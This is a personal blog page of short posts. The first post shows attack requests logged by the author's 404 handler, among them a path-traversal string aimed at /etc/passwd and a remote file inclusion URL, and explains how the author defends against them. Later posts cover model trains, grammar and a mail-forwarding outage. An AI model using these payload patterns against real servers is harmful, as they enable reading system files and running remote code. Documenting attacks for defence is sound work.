Ramblings of Narc

(or, having fun with a public-facing Internet presence)

So, since I upgraded the main narc.ro site, I got a custom 404 handler in the bargain — one that emails me whenever it’s hit. Okay, so it initially sent 500 Internal Server Error, but I’ve fixed that part.

Anyway, the result of this is that I get a whole bunch of very fun emails when people try to hit pages on narc.ro that don’t exist, such as:

• http://www.narc.ro//gazelle/?template=../../../../../../../../../../../../../etc/passwd%00
• http://86.104.40.152/roundcube//bin/msgimport
• http://www.narc.ro/gazelle/?template=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt%3f%3f

I hope I don’t have to tell you not to visit those links — they don’t do anything (except email me, which is annoying).

I’m particularly interested in the first on that list, which is also the most recent. The theoretical narc.ro/gazelle path would have been /opt/www/vhosts/www.narc.ro/htdocs/gazelle. Let’s count the ../es in the path our attacker tried — 13 of them. More than enough to get out of the 6-level deep path and into /. And I probably don’t have to tell you that /etc/passwd is a file you really want to guard pretty well — it has all your users in it (/etc/shadow has the hashed passwords, too, but that one’s protected so an ordinary user (or the apache user) would be unable to read it).

So, what protected me, in this case? Firstly, it was the fortunate fact that the script the attacker was trying to hit doesn’t exist; and second, that wherever I have scripts that are able to take user input for a path (for instance, img.narc.ro works like that), I’ve been careful to put in protection against relative path inputs like that one. http://img.narc.ro/../ just won’t work.

This is a semi-adequate level of protection for me, since I write my own scripts — I don’t have to worry about any mistakes made by anyone other than myself, and I’m pretty careful around this stuff.

But note that I am some random corner of the Internet almost nobody knows about, and I’m still getting attacked. That means no matter who you are, if you’re serving Web content, you must take precautions. And even if you’re the only developer on the system, you should still do your best to contain the threat. Defense in depth should be your key phrase. That’s why I’m currently looking into mod_chroot for my Apache2 installation. Your solution may be different, but have one, or at the very least, be aware that you will be attacked, and have some plan to recover from that if, or when, an attack is successful.

Apparently, spammers’ botnets didn’t work very hard over this holiday season — I only got two spam emails between the 25th and today. Quite interesting.

I’ve been promising pictures of my small collection of H0 scale trains for a while now, so here come some pictures (click the pictures for larger versions):

I get really irritated by people who write every paragraph as one single very very long sentence that looks like they’re on crack and really can’t stop typing because if they did they would get taken away by the IRS man and then be forced to stare at a wall for 15 hours a day and the wall would stare back ’cause there’s mini-micro-cameras in the walls that feed to a huge wall-sized TV that everybody in the local town square looks at. *takes a deep breath*

For the girls among them, I finally have something to say: “You can’t be female, you have no periods!” Evidently, this can work similarly on a male (“You must be a guy [...]“).

I’m very amused by what that says about me… does it make me seem female?

On a more serious side-note, what irritates me about people who spell and punctuate badly is that I tend to be chameleonic, in that I pick up other people’s accents and such, and I’m terribly afraid of ending up with their bad spelling. And grammar. And punctuation. Which is why correcting them is therapeutic for me. So, um… anyone need a copy editor?

Looks like Starfleet stopped forwarding port 25 at some point very recently. I wish I could say what went wrong, but I have no clue. The other forwards (like port 80) still worked, so everything was nice and accessible… except for SMTP. Except for *my e-mail*!

I noticed it had been up for 27 days. So I rebooted it. Let’s see if that solved the issue…

Update: Okay, now I’m pissed. That didn’t solve anything. Let’s try rebooting Hermes…

Update 2: Well, at this point, I’ve rebooted everything, and I’m pretty sure the problem’s not on my end. I guess I’m gonna have to ask around later. Or, you know, it might actually be working, heck if I know. It’s times like these I wish I had a host outside my immediate network to use for a nice telnet. Not too far outside my network, though. For far outside my network I have the Canadian folks’ servers (though I probably shouldn’t be using them).

Update 3: It started working again after about 24 hours. No explanation for what went wrong. *shrug*